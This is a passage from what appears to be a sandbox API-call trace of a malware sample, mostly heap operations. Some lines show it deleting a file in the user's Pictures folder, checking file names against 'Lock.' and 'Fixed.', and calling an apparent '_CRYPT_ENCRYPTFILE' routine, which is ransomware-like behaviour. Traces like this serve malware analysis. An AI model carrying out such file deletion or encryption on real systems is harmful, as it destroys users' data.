hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.675] CloseHandle (hObject=0x2d0) returned 1 [0249.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0249.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0249.677] CloseHandle (hObject=0x2a0) returned 1 [0249.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0249.682] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0249.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0249.683] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.683] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/k1wdGB_YAwU14UY.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp", lpFilePart=0x8cedf4*="k1wdGB_YAwU14UY.bmp") returned 0x2c [0249.683] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k1wdgb_yawu14uy.bmp")) returned 0x20 [0249.683] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd594b40, ftCreationTime.dwHighDateTime=0x1d5eb04, ftLastAccessTime.dwLowDateTime=0xccd26e00, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0xccd26e00, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x9006, dwReserved0=0x1, dwReserved1=0x1c, cFileName="k1wdGB_YAwU14UY.bmp", cAlternateFileName="K1WDGB~1.BMP")) returned 0xa870d0 [0249.684] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k1wdgb_yawu14uy.bmp")) returned 1 [0249.770] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd594b40, ftCreationTime.dwHighDateTime=0x1d5eb04, ftLastAccessTime.dwLowDateTime=0xccd26e00, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0xccd26e00, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x9006, dwReserved0=0x1, dwReserved1=0x1c, cFileName="k1wdGB_YAwU14UY.bmp", cAlternateFileName="K1WDGB~1.BMP")) returned 0 [0249.770] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0249.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0249.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0249.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0249.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0249.770] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0249.771] TranslateMessage (lpMsg=0x8cf968) returned 0 [0249.771] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0249.771] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0249.771] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0249.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0249.771] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e58910 [0249.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/k1wdGB_YAwU14UY.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp", lpFilePart=0x8cf650*="k1wdGB_YAwU14UY.bmp") returned 0x2c [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0249.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\k1wdGB_YAwU14UY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k1wdgb_yawu14uy.bmp")) returned 0xffffffff [0249.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0249.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0249.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0249.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0249.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0249.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MYUszCBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YUszCBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UszCBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="szCBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CBAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAPCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="APCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CzmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mXXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XDSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SG.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0249.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0249.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0249.775] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0249.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0249.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0249.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e55a40 [0249.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MYUszCBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YUszCBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UszCBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="szCBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CBAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAPCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="APCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CzmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mXXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XXDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XDSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SG.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0249.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0249.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0249.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0249.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0249.776] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.777] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0249.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d58 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.777] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, 